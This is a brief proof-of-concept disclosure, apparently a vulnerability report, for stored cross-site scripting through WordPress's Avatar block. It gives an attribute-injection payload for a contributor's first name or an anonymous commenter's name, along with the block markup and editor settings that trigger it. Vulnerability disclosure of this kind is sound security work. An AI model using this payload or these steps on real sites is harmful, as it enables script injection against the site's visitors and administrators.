Default setup:

As a contributor, edit your profile and put the following payload as First Name: " autofocus onfocus=alert`XSS`//, then select the display name with the payload in it and save.

Create/edit a post, add an Avatar block, enable "Link to user profile" and "Open in new tab" in the block settings. Or add the following code in a post while in Code Editor mode: <!-- wp:avatar {"isLink":true,"linkTarget":"_blank"} /-->

The XSS will be triggered when any user will (pre)view the post


Worse setup ("Link to user profile" and "Open in new tab" enabled in the Avatar block settings in the comment template, which can be done by opening /wp-admin/site-editor.php?postType=wp_template&postId=twentytwentyfour%2F%2Fsingle, select one of the Avatar block in the comment and enable the settings)

Simply add a comment as unauthenticated with the following payload in the Name: " autofocus onfocus=alert`XSS`//, and put a dummy Website URL(required for the attack to work)